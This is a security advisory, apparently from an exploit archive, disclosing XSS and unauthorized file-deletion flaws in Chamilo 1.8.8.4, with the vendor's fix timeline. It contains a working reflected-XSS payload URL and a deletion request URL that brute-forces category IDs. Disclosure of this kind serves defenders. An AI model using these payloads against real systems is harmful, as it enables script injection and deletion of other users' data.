Chamilo 1.8.8.4 XSS / File Deletion

2012.08.28

Credit: beford

Risk: Medium

Local: No

Remote: Yes

CVE: CVE-2012-4029 | CVE-2012-4030

CWE: CWE-79

Chamilo 1.8.8.4 Multiple Vulnerabilities
========================

CVE: CVE-2012-4029
Issue: Reflected XSS PHP_SELF in third-party  app, Stored XSS

* PHP_SELF XSS
http://chamilo-1.8.8.4/main/inc/lib/phpdocx/pdf/www/examples.php/'"><img
src=404 onerror=alert(1) >

* Stored XSS unfiltered input category_name

http://chamilo/chamilo-1.8.8.4/main/dropbox/index.php?cidReq=LEETLANG&view=&action=addsentcategory


CVE: CVE-2012-4030
Issue: Unauthorized file delete

* Unauthorized file delete

You have to be subscribed to the course and you can delete other users
categories by bruteforcing the category ID.

http://chamilo/chamilo-1.8.8.4/main/dropbox/index.php?cidReq=COURSEID&view_received_category=&view_sent_category=&view=&action=deletesentcategory&id=CATEGORYID

Vendor:
  www.chamilo.org

Vendor informed:
  Jul 16/2012

Vendor acknowledgement:
  Jul 16/2012

Fix Released
  Version 1.8.8.6 - Jul 20/2012

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Chamilo 1.8.8.4 XSS / File Deletion

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.